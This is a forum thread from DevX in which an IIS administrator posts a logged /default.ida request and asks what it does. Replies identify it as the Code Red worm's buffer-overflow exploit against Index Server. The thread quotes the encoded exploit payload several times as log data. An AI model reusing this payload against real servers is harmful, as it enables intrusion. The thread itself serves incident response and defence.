DevX Home    Today's Headlines   Articles Archive   Tip Bank   Forums   

Results 1 to 5 of 5

Thread: Index Server Attack on IIS

  1. #1
    Savage Guest

    Index Server Attack on IIS


    Here is the log from an attack. What can be achomplished by this attack?
    /default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%ucb
    d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u531b%u53ff%u0078%u0000%u00=a/

    The log produces a 200 response. Which means file found. There is no default.ida
    on the server, I searched and nothing came up.
    A error is produced "FILE. error ..."

    Can the attacker gain access this way?
    Thanks for any help.
    Savage

  2. #2
    Savage Guest

    Re: Index Server Attack on IIS


    I went to Microsofts web site . The have a page on securing a web server.
    I Did the following:
    In IIS under the web site I clicked properties and under home directory I
    clicked configure. I removed the reference to .ida files.

    Then the attack came again. This time the hacker was given a response of
    404 "file not found". I got at least 15 attacks from 15 different IP addresses.
    This may be a trojan program running on unsuppecting machines. Is there any
    way to track down these machines? OR Find out who is sending this data?
    Thanks
    Savage

    "Savage" <vondras@enteract.com> wrote:
    >
    >Here is the log from an attack. What can be achomplished by this attack?
    >/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc

    bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
    >
    >The log produces a 200 response. Which means file found. There is no default.ida
    >on the server, I searched and nothing came up.
    >A error is produced "FILE. error ..."
    >
    >Can the attacker gain access this way?
    >Thanks for any help.
    >Savage



  3. #3
    Don Bevis Guest

    Re: Index Server Attack on IIS

    This may be the "unchecked buffer" hole, being exploited by the Code Red
    worm:

    http://www.microsoft.com/technet/sec...n/MS01-033.asp


    "Savage" <vondras@enteract.com> wrote in message
    news:3b575956$1@news.devx.com...
    >
    > I went to Microsofts web site . The have a page on securing a web server.
    > I Did the following:
    > In IIS under the web site I clicked properties and under home directory I
    > clicked configure. I removed the reference to .ida files.
    >
    > Then the attack came again. This time the hacker was given a response of
    > 404 "file not found". I got at least 15 attacks from 15 different IP

    addresses.
    > This may be a trojan program running on unsuppecting machines. Is there

    any
    > way to track down these machines? OR Find out who is sending this data?
    > Thanks
    > Savage
    >
    > "Savage" <vondras@enteract.com> wrote:
    > >
    > >Here is the log from an attack. What can be achomplished by this attack?

    >
    >/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn

    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
    nnnnnnnnnnnnn%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
    bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a/
    > >
    > >The log produces a 200 response. Which means file found. There is no

    default.ida
    > >on the server, I searched and nothing came up.
    > >A error is produced "FILE. error ..."
    > >
    > >Can the attacker gain access this way?
    > >Thanks for any help.
    > >Savage

    >




  4. #4
    Michael Howard Guest

    Re: Index Server Attack on IIS


    looks like code red.


    "Savage" <vondras@enteract.com> wrote:
    >
    >Here is the log from an attack. What can be achomplished by this attack?
    >/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc

    bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
    >
    >The log produces a 200 response. Which means file found. There is no default.ida
    >on the server, I searched and nothing came up.
    >A error is produced "FILE. error ..."
    >
    >Can the attacker gain access this way?
    >Thanks for any help.
    >Savage



  5. #5
    conny Guest

    Re: Index Server Attack on IIS


    Looks like the famos code red worm (Version1) witch will also
    affect your Server if...

    * you installed your WEB Server (Port 80) on a Windows 2000 IIS
    * you dit not fixed the secure hole in Index Server (default.ida)


    (My logfiles are looking the same except the space after the questionmark
    ...?%20nnn and myn 'ns' are in uppercase.

    Your logfiles now may also show requests like
    ...default.ida?XXXXX...
    this is the new Version of code red (Version 2)
    The error message of Version 1 and 2 are not simmilar.
    Version 1 will raise the 'malformed header' error and
    Version 2 the 'file not found' code
    You can find out how to disinfect at the NAV (norton antivir) homepage.
    www.symantec.com/search

    regards
    Conny


    "Savage" <vondras@enteract.com> wrote:
    >
    >Here is the log from an attack. What can be achomplished by this attack?
    >/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc

    bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
    >
    >The log produces a 200 response. Which means file found. There is no default.ida
    >on the server, I searched and nothing came up.
    >A error is produced "FILE. error ..."
    >
    >Can the attacker gain access this way?
    >Thanks for any help.
    >Savage



Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center
 
 
FAQ
Latest Articles
Java
.NET
XML
Database
Enterprise
Questions? Contact us.
C++
Web Development
Wireless
Latest Tips
Open Source


   Development Centers

   -- Android Development Center
   -- Cloud Development Project Center
   -- HTML5 Development Center
   -- Windows Mobile Development Center